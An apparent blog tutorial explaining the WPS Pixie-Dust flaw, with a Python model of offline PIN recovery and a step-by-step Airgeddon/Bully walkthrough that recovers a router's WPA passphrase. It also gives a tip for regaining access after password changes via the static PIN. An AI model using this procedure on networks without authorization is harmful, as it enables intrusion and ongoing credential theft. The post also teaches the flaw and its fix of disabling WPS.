Pixie-Dust Wi-Fi Attack: Theory & Practice

In my series on Wi-Fi hacking I have already covered WPA handshake capture and social engineering. In this post I present yet another way of gaining access to a network: it targets the WPS protocol and is known as the Pixie-Dust attack. After a short explanation of the theory behind the flaw, you will find a step-by-step guide.

WPS: where does the flaw come from?

First, let's look at the victim of our attack: Wi-Fi Protected Setup. Commonly known as WPS, it is a feature found in the vast majority of consumer routers that lets a user join the network without typing the (often long) WPA passphrase. WPS offers two ways of connecting: a physical button on the router (push-button configuration), and an 8-digit PIN, usually printed on a label on the router. Our attack targets the latter: the infamous WPS PIN.
[Figure: the WPS PIN on the router's label, circled in red]
In 2011, security researcher Stefan Viehböck found a design flaw in the WPS PIN method that affected essentially every router supporting it: the PIN could simply be brute-forced over the air. He published a proof-of-concept tool, and Craig Heffner of Tactical Network Solutions released Reaver, which automated the attack and is still the best-known tool for it. Cracking the 8-digit PIN was far faster than it should have been. The last digit is a checksum of the first seven, so an attacker only has to guess seven digits, which cuts the space to 10^7 = 10,000,000. Worse, the protocol lets the attacker verify each half of the PIN separately: the attacking client acts as an external registrar, and the access point (the WPS enrollee in this exchange) acknowledges the first four digits in one message and the remaining digits in a later one, answering with an EAP-NACK as soon as a half is wrong. The first half has four digits and the second has only three free ones (remember the checksum), so at most 10^4 + 10^3 = 11,000 attempts are needed to recover the PIN. Each attempt is a full WPS exchange with the router, so the attack took hours rather than seconds (Viehböck estimated under four hours on average), which is still catastrophic for an 8-digit secret.

Vendors responded with the obvious mitigations: limiting the number of failed attempts and locking WPS afterwards, and/or imposing a delay between attempts. On a router that locks after a few failures, the Reaver brute force becomes impractical (though many older devices never received a fix). But you know what they say about cyber security: it never stops evolving.

A new generation of WPS attack: Pixie-Dust

Fast-forward to 2014. Pentester Dominique Bongard presented what he called the Pixie-Dust attack, which works against devices built on some of the most common wireless chipsets, including Ralink, Realtek, MediaTek and Broadcom.

The WPS PIN itself is never sent over the air. Instead, each side proves that it knows the PIN by sending hashes that combine each half of the PIN with a secret nonce; on the access point's side these are E-Hash1 and E-Hash2, built from the nonces E-S1 and E-S2, which are only revealed later in the exchange. That proof is only as strong as the nonces: they must be unpredictable. Computers do not get unpredictability for free. A software random number generator starts from a "seed", runs it through a deterministic algorithm and returns a pseudo-random output, so if the seed is guessable, so is every number derived from it. A cryptographic "nonce" (short for "number used once") is exactly such a value, and the protocol assumes it cannot be guessed. In short, the Pixie-Dust attack exploits the lack of randomness in how some chipsets generate E-S1 and E-S2.

[Diagram: simplified WPS message exchange, adapted from the one on Wikipedia.]

In simpler terms, the attack works because the affected chipsets derive these "secret" nonces from known functions with trivial seeds: some use a constant (E-S1 = E-S2 = 0), others seed a simple generator with the timestamp of the transaction or with the same state that produced the public E-Nonce, which the attacker has already seen. Once E-S1 and E-S2 can be guessed, PIN candidates can be tested against E-Hash1 and E-Hash2 offline, without sending anything more to the router, so lockouts and delays no longer help.
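To make both points concrete (the halves split from the brute-force section above, and the nonce weakness), here is an added Python model of the WPS PIN proof written for this page; it is not code from pixiewps, Bully, Reaver or Airgeddon. The Diffie-Hellman and key-derivation steps are skipped: AUTH_KEY, PKE and PKR are constructed constants, which the attacker, acting as registrar, knows in the real exchange anyway. The hash constructions (PSK halves and E-Hash1/E-Hash2) follow the WPS specification; the weak enrollee uses E-S1 = E-S2 = 0, the behaviour Bongard reported for Ralink/MediaTek firmware, and the strong one uses random nonces to show why the offline search then fails.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed stand-ins for handshake material. In the real protocol AuthKey is
# derived from the Diffie-Hellman exchange in M1/M2 and PKE/PKR are the 1536-bit
# DH public keys; the attacker, acting as registrar, knows all three.
AUTH_KEY = hashlib.sha256(b"constructed AuthKey for this example").digest()
PKE = bytes((i * 7) % 256 for i in range(192))    # enrollee (AP) public key, constructed
PKR = bytes((i * 13) % 256 for i in range(192))   # registrar (attacker) public key, constructed


def wps_pin_checksum(prefix7: int) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,... from the rightmost of the 7 digits."""
    accum, pin = 0, prefix7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def wps_pin_from_prefix(prefix7: int) -> str:
    """Full 8-digit PIN for a 7-digit prefix, e.g. 1234567 -> '12345670'."""
    return f"{prefix7:07d}{wps_pin_checksum(prefix7)}"


def psk_half(auth_key: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN as ASCII)."""
    return hmac.new(auth_key, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(auth_key: bytes, e_s: bytes, psk: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(auth_key, e_s + psk + PKE + PKR, hashlib.sha256).digest()


def enrollee_m3(pin: str, e_s1: bytes, e_s2: bytes) -> Tuple[bytes, bytes]:
    """The commitment the AP (WPS enrollee) sends in M3, before E-S1/E-S2 are revealed."""
    return (e_hash(AUTH_KEY, e_s1, psk_half(AUTH_KEY, pin[:4])),
            e_hash(AUTH_KEY, e_s2, psk_half(AUTH_KEY, pin[4:])))


def pixie_dust_recover(e_hash1: bytes, e_hash2: bytes,
                       guess_es1: bytes, guess_es2: bytes) -> Optional[str]:
    """Offline PIN recovery from M3 with guessed nonces: at most 10^4 + 10^3 HMACs,
    and no further packets to the router, so lockouts and delays do not apply."""
    first_half = None
    for n in range(10_000):                      # first half: 4 free digits
        half = f"{n:04d}"
        if e_hash(AUTH_KEY, guess_es1, psk_half(AUTH_KEY, half)) == e_hash1:
            first_half = half
            break
    if first_half is None:
        return None                              # wrong nonce guess (or truly random nonces)
    for n in range(1_000):                       # second half: 3 free digits + checksum
        pin = wps_pin_from_prefix(int(first_half) * 1000 + n)
        if e_hash(AUTH_KEY, guess_es2, psk_half(AUTH_KEY, pin[4:])) == e_hash2:
            return pin
    return None


def demo_weak_enrollee() -> Optional[str]:
    """Ralink/MediaTek-style firmware: E-S1 = E-S2 = 0. Guessing zeros recovers the PIN."""
    pin = wps_pin_from_prefix(1234567)           # the router's PIN, unknown to the attacker
    h1, h2 = enrollee_m3(pin, bytes(16), bytes(16))
    return pixie_dust_recover(h1, h2, bytes(16), bytes(16))


def demo_strong_enrollee() -> Optional[str]:
    """Properly random nonces: the same guess finds nothing, and the attacker is back
    to online guessing against the router's lockout."""
    pin = wps_pin_from_prefix(1234567)
    h1, h2 = enrollee_m3(pin, os.urandom(16), os.urandom(16))
    return pixie_dust_recover(h1, h2, bytes(16), bytes(16))


if __name__ == "__main__":
    print("weak enrollee (E-S1 = E-S2 = 0):", demo_weak_enrollee())
    print("random nonces:                  ", demo_strong_enrollee())
```

The whole offline search is 11,000 HMAC computations, which finishes in well under a second; the real pixiewps additionally reconstructs the nonces for chipsets that derive them from a seeded generator, which is why it also needs E-Nonce and the public keys captured from M1 to M3.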

But can we learn without practice? No. So let's demonstrate the attack.

Requirements

Nothing too different from the previous attacks I covered:
  • Raspberry Pi 3 or later running Kali Linux (tutorial here)
  • Wi-Fi card capable of monitor mode and packet injection
  • Your own network to test against (you must have explicit authorization before proceeding; please read the disclaimer in the side menu of this website)
  • Laptop to control the Pi via VNC (tutorial here)

Prerequisite Tools

To demonstrate the Pixie-Dust exploit we will use Airgeddon, a wireless attack framework that bundles the tools we need into a single suite. Getting it is simple: clone the Git repository, enter the new directory and launch the suite by running airgeddon.sh as a bash script (it needs root):

root@kali:~# git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
root@kali:~# cd airgeddon
root@kali:~/airgeddon# bash ./airgeddon.sh

Upon launch, Airgeddon checks for its dependencies. On a full Kali Linux install they should all be present. For this attack in particular, make sure bully (or reaver) and pixiewps are on your system, since Airgeddon only drives them. If anything is missing, install it with:

root@kali:~# apt-get install MISSING_PACKAGE

Launching the attack

The first step is to select our wireless adapter from the list Airgeddon displays; in my case it is wlan1mon. Then we select option 8 to enter the WPS attacks menu:
Interface wlan1mon selected. Mode: Monitor. Supported bands: 2.4 GHz, 5 GHz.
Select an option from menu:
----------
1. Select another network interface
2. Put interface in monitor mode
3. Put interface in managed mode
----------
4. DoS attacks menu
5. Handshake tools menu
6. Offline WPA/WPA2 decrypt menu
7. Evil Twin attacks menu
8. WPS attacks menu
9. WEP attacks menu
----------
10. About & Credits
11. Options and language menu
12. Exit script
After putting the interface into monitor mode (option 2 if it is not already), we are in the WPS attacks menu and ready to scan for nearby networks, so we choose option 4:
----------
4

***********Exploring for targets***********
Exploring for targets option chosen (monitor mode enabled)

Selected interface wlan1mon is in monitor mode. Exploration can be performed

Checking to solve possible "bad FCS" problem if exists. Parametrizing...
Done! Parameter set

Your wifi card supports the 5GHz band but your "wash" version included in reaver package
(v1.6.3) is not able to scan both bands at once. To use dual band scan feature you must 
have at least version v1.6.5 so you have to make a choice. Do you want to use the 5GHz 
band? (If you answer no ("n"), 2.4GHz band will be scanned) [y/N]
A new window listing the WPS-enabled networks in range will pop up (wash only shows access points advertising WPS, and flags those that are currently locked; it cannot tell which ones are vulnerable to Pixie-Dust). Let the scan run for a few seconds and, as soon as the target appears, close the window. We now load the target into the Bully module: select it from the network list, then choose the Bully Pixie-Dust attack (option 7).
Select target network:
1

***********WPS attacks menu***********
Interface wlan1mon selected. Mode: Monitor. Supported bands: 2.4GHz, 5GHz.
Selected WPS BSSID: xx
Selected WPS channel: 2
Selected WPS ESSID: xx
WPS locked network: No

Select an option from menu:
----------
1. Select another network interface
2. Put interface in monitor mode
3. Put interface in managed mode
4. Explore for targets (monitor mode needed)
----------(monitor mode needed for attacks)----------
5. (bully) Custom PIN association
6. (reaver) Custom PIN association
7. (bully) Pixie Dust attack
8. (reaver) Pixie Dust attack
9. (bully) Bruteforce PIN attack
10. (reaver) Bruteforce PIN attack
11. (bully) Known PINs database based attack
12. (reaver) Known PINs database based attack
----------
13. Offline PIN generation using algorithms and database
----------
The last value to enter is the timeout (the time after which the attack is declared a failure); I chose 120 seconds. Bully runs the first messages of the WPS exchange with the router (M1 to M3) and hands the captured values (PKE, PKR, E-Hash1, E-Hash2, AuthKey and E-Nonce) to pixiewps, which recovers the PIN offline. Bully then completes the exchange with that PIN and the router hands over its current WPA passphrase; PIN and password appear at the bottom of the screen, giving us full access to the network. Note that if we record the WPS PIN, we can later use the "custom PIN association" module to retrieve the new passphrase every time it is changed: the PIN is static, and the router gives the current credentials to anyone who proves knowledge of it. This keeps working until the target disables WPS or replaces the router, which shows how severe this flaw is: changing the Wi-Fi password does not help, and the only real fix is to turn WPS off (or, on firmware that keeps answering WPS requests regardless of that setting, to replace the hardware).
